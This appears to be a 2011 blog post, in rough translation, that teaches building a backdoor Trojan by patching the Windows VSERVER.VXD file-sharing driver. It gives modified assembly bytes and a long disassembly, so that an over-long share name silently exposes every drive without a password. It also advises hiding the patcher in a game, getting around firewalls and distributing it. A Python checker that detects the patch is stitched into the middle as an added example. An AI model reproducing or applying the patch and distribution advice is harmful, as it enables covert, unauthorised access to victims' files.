
Friday, 11 November 2011

Trojan teach you to do

Trojan programs are popular online, but they are actually quite simple: most of them modify the registry or an INI file so that a file gets loaded to provide a service, and that makes them easy to detect even by hand. First, look for unknown services that have been added. Second, since a Trojan running as a service usually has to open a network communication port, checking for newly added listening ports also turns up Trojans easily. In fact, one could make a much better Trojan by slightly modifying the operating system kernel itself; then the registry need not be changed at all, and the user finds it much harder to notice.

Below is a method for making a Trojan by making a small change to a driver. You can analyze other drivers and make your own the same way. What is used here is WINDOWS file sharing and remote administration. If a WINDOWS share is named ADMIN$, it allows remote administration: once you log in through ADMIN$, every drive is fully shared under its drive letter plus $. The listing below is the part of VSERVER.VXD that handles shares. SUB_0027 checks the password; once the password is correct, the code checks whether the share name is ADMIN$ and, if so, whether C$, D$, ... have already been shared (DATA_0431 == 0?); if they have not, it calls SUB_0230 to share them. SUB_0230 takes one parameter, a pointer to the password; if that pointer is 0 there is no password. That parameter is what is used here, because it makes the change easy. Obviously, if SUB_0230 can be called whenever we want,
we have opened a back door. LOC_0415 checks whether the share-name string received over the network is longer than 0DH (counting the terminating 0); if so it jumps to LOC_0419, which returns an error. Clearly this is where a call to SUB_0230 can be inserted. Looking at LOC_0419, 7 bytes are available, enough for:
CALL SUB_0230
NEW_LOC_0418: POP eax
jmp 03469
Exactly 7 bytes. At 3436, JE LOC_0418 jumps to LOC_0418 when the directory to be shared was not found; that obviously has to change, to JE NEW_LOC_0418. The LOC_0415 block now has to PUSH 0 before it jumps to LOC_0419, to supply the argument for SUB_0230.
Here is the modified LOC_0415:

LOC_0415:

03415 XOR EAX,EAX ;2 bytes; like SUB AL,AL this gives AL=0, and also EAX=0
03417 PUSH EAX ;1 byte; the DWORD argument 0 for the call to SUB_0230
03418 XOR ECX,ECX ;2 bytes; ECX=0
0341A DEC ECX ;1 byte; ECX=0FFFFFFFFH, same effect as MOV ECX,0FFFFH but fewer bytes
0341B mov edi,ebx ;2 bytes
0341D repne scasb ;2 bytes
0341F SUB EDI,EBX ;2 bytes; get the share name length
03421 CMP EDI,0Dh ;3 bytes; jump if greater than or equal to 0DH. The condition here can be changed, e.g. to jump only on a specific length.
03424 ja short loc_0419 ;2 bytes
03426 POP EAX ;1 byte; stack balance
03427 PUSH EDI ;1 byte
03428 POP EAX ;1 byte; EAX=EDI, the share name length, needed later

The bytes are just enough. Note that at DATA_0182 there is a relocation; bytes of that kind cannot simply be changed. You could add a small piece of code to a good program or game of yours that modifies the victim's VSERVER.VXD this way, preferably also the VSERVER.VXD inside the packed installation files in the WINDOWS install directory on the hard disk; and since shared directories on \\IP are reached through port 139, it is best to add another port as well to get around some router/firewall settings, and then distribute your program...

On a machine infected with your Trojan, accessing one of its shared directories with a long string of letters appended to the name (share name length greater than or equal to 0DH) produces an error, but after that you can access \\IP\C$, \\IP\D$, ..., and these are full shares. Without that long-name access first, and if the owner has not set up remote administration, \\IP\C$, \\IP\D$, ... cannot be accessed at all, and the owner cannot see this kind of share in Network Monitor either, so it is very hard to notice. Note that once you enter a shared directory, Network Monitor can still see that.
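Because the modification described above rewrites bytes at fixed addresses inside sub_0026 without changing the file's size or how it loads, a defender can catch it by comparing those bytes against the original listing. The following Python is an added example, not code from the original post; it assumes that the listing addresses (03415h and so on) are offsets into a flat image of the code object (for a real LE-format VxD you would first locate that object), that the reference bytes are exactly those shown in the listing, and that the sample images are constructed stand-ins rather than real VSERVER.VXD files.

```python
# Added example: check that the region of VSERVER.VXD's sub_0026 which the
# article patches still matches the original listing.
# Assumption: listing addresses are offsets into a flat image of the code object.
from dataclasses import dataclass

# Reference bytes transcribed from the listing. The disassembler prints immediates
# as big-endian groups (e.g. "B9 0000FFFF"); the bytes in the file are little-endian,
# so "mov ecx,0FFFFh" is B9 FF FF 00 00. The operand of "mov ebp,data_0182" at
# 0342Ah is relocated, so it is deliberately left out of the reference set.
REFERENCE = {
    0x3415: bytes.fromhex("2AC0"),          # loc_0415: sub al,al
    0x3417: bytes.fromhex("B9FFFF0000"),    # mov ecx,0FFFFh
    0x341C: bytes.fromhex("8BFB"),          # mov edi,ebx
    0x341E: bytes.fromhex("F2AE"),          # repne scasb
    0x3420: bytes.fromhex("8BC7"),          # mov eax,edi
    0x3422: bytes.fromhex("2BC3"),          # sub eax,ebx
    0x3424: bytes.fromhex("83F80D"),        # cmp eax,0Dh
    0x3427: bytes.fromhex("7726"),          # ja short loc_0419
    0x3429: bytes.fromhex("55"),            # push ebp
    0x3436: bytes.fromhex("7416"),          # je short loc_0418
    0x344E: bytes.fromhex("5D"),            # loc_0418: pop ebp
    0x344F: bytes.fromhex("B802000600"),    # loc_0419: mov eax,60002h
    0x3454: bytes.fromhex("5EF9C3"),        # pop esi / stc / retn
}

@dataclass
class Mismatch:
    offset: int
    expected: bytes
    actual: bytes

def check_image(image: bytes) -> list[Mismatch]:
    """Return every reference run that does not match the image.
    A truncated image also counts as a mismatch (actual shorter than expected)."""
    findings = []
    for off, expected in sorted(REFERENCE.items()):
        actual = image[off:off + len(expected)]
        if actual != expected:
            findings.append(Mismatch(off, expected, actual))
    return findings

def build_clean_image(size: int = 0x3700) -> bytes:
    """Constructed stand-in for a flat code image: zero-filled except for the
    reference bytes at their listing offsets (not a real VSERVER.VXD)."""
    buf = bytearray(size)
    for off, data in REFERENCE.items():
        buf[off:off + len(data)] = data
    return bytes(buf)

def tamper(image: bytes, offset: int, new_bytes: bytes) -> bytes:
    """Constructed tampering: overwrite bytes in place, keeping the size unchanged."""
    buf = bytearray(image)
    buf[offset:offset + len(new_bytes)] = new_bytes
    return bytes(buf)

if __name__ == "__main__":
    clean = build_clean_image()
    print("clean image:", check_image(clean) or "no mismatch")
    # Overwriting the length compare at 03424h with NOPs keeps the file size the
    # same, which is why a size or timestamp check alone is not enough.
    for m in check_image(tamper(clean, 0x3424, b"\x90\x90\x90")):
        print(f"mismatch at {m.offset:05X}h: expected {m.expected.hex()} got {m.actual.hex()}")
```

A comparison against a full-file hash from a known-good installation medium is stronger still; the byte-level check above only shows which of the listed instructions were touched.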




;---------------------------------------------------------------------------
; SUBROUTINE
;
; Called from: 031FD, 32CC
;---------------------------------------------------------------------------

033F4 sub_0026 proc near
033F4 56 push esi
033F5 66| 81 3B 5C5C cmp word ptr [ebx],5C5Ch
033FA 74 07 je short loc_0412 ; Jump if equal
033FC 66| 81 3B 2F2F cmp word ptr [ebx],2F2Fh
03401 75 12 jne short loc_0415 ; Jump if not equal
03403 loc_0412: ; xref 033FA
03403 8D 73 02 lea esi,dword ptr [ebx+2] ; Load effective addr
03406 loc_0413: ; xref 0340F
03406 E8 00006961 call sub_0207 ; (09D6C)
0340B 74 05 jz short loc_0414 ; Jump if zero
0340D 3C 5C cmp al,5Ch ; '\'
0340F 75 F5 jne loc_0413 ; Jump if not equal
03411 46 inc esi
03412 loc_0414: ; xref 0340B
03412 8D 5E FF lea ebx,dword ptr [esi-1] ; Load effective addr
03415 loc_0415: ; xref 03401
03415 2A C0 sub al,al
03417 B9 0000FFFF mov ecx,0FFFFh
0341C 8B FB mov edi,ebx
0341E F2/ AE repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
03420 8B C7 mov eax,edi
03422 2B C3 sub eax,ebx
03424 83 F8 0D cmp eax,0Dh
03427 77 26 ja short loc_0419 ; Jump if above
03429 55 push ebp
0342A 8B 2D 00011CA4 mov ebp,dword ptr data_0182 ;THE SHARE POINTER ; (11CA4=0)
03430 loc_0416: ; xref 0344C
03430 81 FD 00011CA4 cmp ebp,11CA4h
03436 74 16 je short loc_0418 ; Jump if equal
03438 80 7D 08 02 cmp byte ptr [ebp+ClientEBP],2
0343C 75 0B jne short loc_0417 ; Jump if not equal
0343E 8D 75 11 lea esi,dword ptr [ebp+11h] ; Load effective addr
03441 8B FB mov edi,ebx
03443 8B C8 mov ecx,eax
03445 F3/ A6 repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
03447 74 3A jz short loc_0424 ; Jump if zero
03449 loc_0417: ; xref 0343C
03449 8B 6D 00 mov ebp,dword ptr [ebp+ClientEDI]
0344C EB E2 jmp short loc_0416 ; (03430)
0344E loc_0418: ; xref 03436
0344E 5D pop ebp
0344F loc_0419: ; xref 03427
0344F B8 00060002 mov eax,60002h
03454 5E pop esi
03455 F9 stc ; Set carry flag
03456 C3 retn
03457 loc_0420: ; xref 0349F
03457 8B 43 34 mov eax,dword ptr [ebx+34h]
0345A 8B 1B mov ebx,[ebx]
0345C 81 FB 00011CA4 cmp ebx,11CA4h
03462 74 0A je short loc_0421 ; Jump if equal
03464 3B 43 34 cmp eax,dword ptr [ebx+34h]
03467 74 2F je short loc_0425 ; Jump if equal
03469 B8 00020002 mov eax,20002h
0346E loc_0421: ; xref 03462, 3481, 354D, 35E8
0346E 5E pop esi
0346F F9 stc ; Set carry flag
03470 C3 retn
03471 33 DB db 33h,0DBh
03473 loc_0422: ; xref 0349D
03473 5E pop esi
03474 C3 retn
03475 loc_0423: ; xref 034C1
03475 8B D3 mov edx,ebx
03477 BB 0000000A mov ebx,0Ah ; (0000A=0B8h)
0347C B8 00590002 mov eax,590002h
03481 EB EB jmp short loc_0421 ; (0346E)
03483 loc_0424: ; xref 03447
03483 8B DD mov ebx,ebp
03485 59 pop ecx ;ebp, the password length
03486 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0)
0348D 75 12 jnz short loc_0426 ; Jump if not zero
0348F 8B 34 24 mov esi,[esp]
03492 F6 46 1F 01 test byte ptr [esi+1Fh],1
03496 75 09 jnz short loc_0426 ; Jump if not zero
03498 loc_0425: ; xref 03467
03498 E8 00000182 call sub_0027 ; (0361F) check the password
0349D 72 D4 jc loc_0422 ; Jump if carry Set
0349F 75 B6 jnz loc_0420 ; Jump if not zero
034A1 loc_0426: ; xref 0348D, 3496
034A1 F6 43 10 40 test byte ptr [ebx+10h],40h ; '@'
034A5 0F 85 00000089 jnz loc_0433 ; Jump if not zero
034AB A1 00011CC4 mov eax,data_0190 ; (11CC4=0FFFFF000h)
034B0 80 38 01 cmp byte ptr [eax],1
034B3 0F 83 00000134 jae loc_0439 ; Jump if above or =
034B9 loc_0427: ; xref 0353B, 3564, 356F, 35F6
; 3611
034B9 66| 8B 53 0E mov dx,word ptr [ebx+0Eh]
034BD 66| 39 53 0C cmp word ptr [ebx+0Ch],dx
034C1 76 B2 jbe loc_0423 ; Jump if below or =
034C3 loc_0428: ; xref 03528
034C3 8B 0D 00011B34 mov ecx,dword ptr data_0170 ; (11B34=0)
034C9 85 C9 test ecx,ecx
034CB 74 56 jz short loc_0431 ; Jump if zero
034CD 8B 01 mov eax,[ecx]
034CF A3 00011B34 mov data_0170,eax ; (11B34=0)
034D4 66| FF 43 0E inc word ptr [ebx+0Eh]
034D8 89 59 0C mov dword ptr [ecx+0Ch],ebx
034DB C6 41 14 03 mov byte ptr [ecx+14h],3
034DF 8A 41 17 mov al,byte ptr [ecx+17h]
034E2 04 08 add al,8
034E4 0C C0 or al,0C0h
034E6 88 41 17 mov byte ptr [ecx+17h],al
034E9 C6 41 15 00 mov byte ptr [ecx+15h],0
034ED 8B 34 24 mov esi,[esp]
034F0 F6 46 1F 08 test byte ptr [esi+1Fh],8
034F4 75 08 jnz short loc_0429 ; Jump if not zero
034F6 A1 00011CC8 mov eax,data_0191 ; (11CC8=0FFFFF000h)
034FB FF 40 10 inc dword ptr [eax+10h]
034FE loc_0429: ; xref 034F4
034FE 5E pop esi
034FF 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h ;ADMIN$ ?
03506 75 0E jne short loc_0430 ; Jump if not equal
03508 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh
0350E 75 06 jne short loc_0430 ; Jump if not equal
03510 80 7B 17 00 cmp byte ptr [ebx+17h],0
03514 74 61 je short loc_0435 ; Jump if equal
03516 loc_0430: ; xref 03506, 350E, 3584
03516 B8 00011CD4 mov eax,11CD4h
0351B E8 000056BC call sub_0130 ; (08BDC)
03520 85 DB test ebx,ebx
03522 C3 retn
03523 loc_0431: ; xref 034CB
03523 E8 00000190 call sub_0028 ; (036B8)
03528 73 99 jnc loc_0428 ; Jump if carry=0
0352A EB 00 jmp short loc_0432 ; (0352C)
0352C loc_0432: ; xref 0352A
0352C 5F pop edi
0352D B8 00590002 mov eax,590002h
03532 F9 stc ; Set carry flag
03533 C3 retn
03534 loc_0433: ; xref 034A5
03534 8B 34 24 mov esi,[esp]
03537 F6 46 1F 01 test byte ptr [esi+1Fh],1
0353B 0F 85 FFFFFF78 jnz loc_0427 ; Jump if not zero
03541 loc_0434: ; xref 03575, 358F
03541 8B D3 mov edx,ebx
03543 BB 0000000B mov ebx,0Bh
03548 B8 00050001 mov eax,50001h
0354D E9 FFFFFF1C jmp loc_0421 ; (0346E)
;* No entry point to code
03552 8B 3C 24 mov edi,[esp]
03555 53 push ebx
03556 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h)
0355C E8 FFFFE407 call sub_0009 ; (01968)
03561 5B pop ebx
03562 0B ED or ebp,ebp ; Zero ?
03564 0F 84 FFFFFF4F jz loc_0427 ; Jump if zero
0356A 3E: 83 7D 10 00 cmp dword ptr ds:[ebp+ClientEBX],0
0356F 0F 85 FFFFFF44 jne loc_0427 ; Jump if not equal
03575 EB CA jmp short loc_0434 ; (03541)
03577 loc_0435: ; xref 03514
03577 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0)
0357E 74 11 jz short loc_0436 ; Jump if zero
03580 F6 46 1F 01 test byte ptr [esi+1Fh],1
03584 75 90 jnz loc_0430 ; NOT ADMIN$ Jump if not zero
03586 66| FF 4B 0E dec word ptr [ebx+0Eh]
0358A C6 41 14 00 mov byte ptr [ecx+14h],0
0358E 56 push esi
0358F EB B0 jmp short loc_0434 ; (03541)
03591 loc_0436: ; xref 0357E
03591 80 4E 1F 01 or byte ptr [esi+1Fh],1
03595 C6 41 15 01 mov byte ptr [ecx+15h],1
03599 8B FE mov edi,esi
0359B 8B 35 000128B8 mov esi,dword ptr data_0379 ; (128B8=0FFFFF000h)
035A1 83 3D 000134E0 00 cmp dword ptr data_0431,0 ; C$,D$ HAVE BEEN SHARED (134E0=0)
035A8 75 14 jne short loc_0437 ; Jump if not equal
035AA 52 push edx
035AB 51 push ecx
035AC 8D 4B 1E lea ecx,dword ptr [ebx+1Eh] ;THE ADMIN$ PASSWORD
035AF 51 push ecx ; PARAMETER_1 if ecx=0 no password
035B0 E8 0000856F call sub_0230 ;MAKE C$,D$ SHARE (0BB24)
035B5 59 pop ecx
035B6 59 pop ecx
035B7 5A pop edx
035B8 FF 05 000134E0 inc dword ptr data_0431 ; (134E0=0)
035BE loc_0437: ; xref 035A8
035BE 53 push ebx
035BF E8 FFFFE3A4 call sub_0009 ; (01968)
035C4 72 13 jc short loc_0438 ; Jump if carry Set
035C6 8B 3D 00011CCC mov edi,dword ptr data_0192 ; (11CCC=0FFFFF000h)
035CC 8B BF 000000E2 mov edi,dword ptr ds:[0E2h][edi] ; (000E2=358B0000h)
035D2 89 7B 04 mov dword ptr [ebx+4],edi
035D5 5B pop ebx
035D6 85 DB test ebx,ebx
035D8 C3 retn
035D9 loc_0438: ; xref 035C4
035D9 5A pop edx
035DA C6 41 14 00 mov byte ptr [ecx+14h],0
035DE BB 0000000C mov ebx,0Ch
035E3 B8 00010002 mov eax,10002h
035E8 E9 FFFFFE81 jmp loc_0421 ; (0346E)
035ED loc_0439: ; xref 034B3
035ED 75 28 jnz short loc_0440 ; Jump if not zero
035EF 8B 34 24 mov esi,[esp]
035F2 F6 46 1F 01 test byte ptr [esi+1Fh],1
035F6 0F 85 FFFFFEBD jnz loc_0427 ; Jump if not zero
035FC 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h
03603 75 12 jne short loc_0440 ; Jump if not equal
03605 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh
0360B 75 0A jne short loc_0440 ; Jump if not equal
0360D 80 7B 17 00 cmp byte ptr [ebx+17h],0
03611 0F 84 FFFFFEA2 je loc_0427 ; Jump if equal
03617 loc_0440: ; xref 035ED, 3603, 360B
03617 B8 00510002 mov eax,510002h
0361C 5F pop edi
0361D F9 stc ; Set carry flag
0361E C3 retn
sub_0026 endp
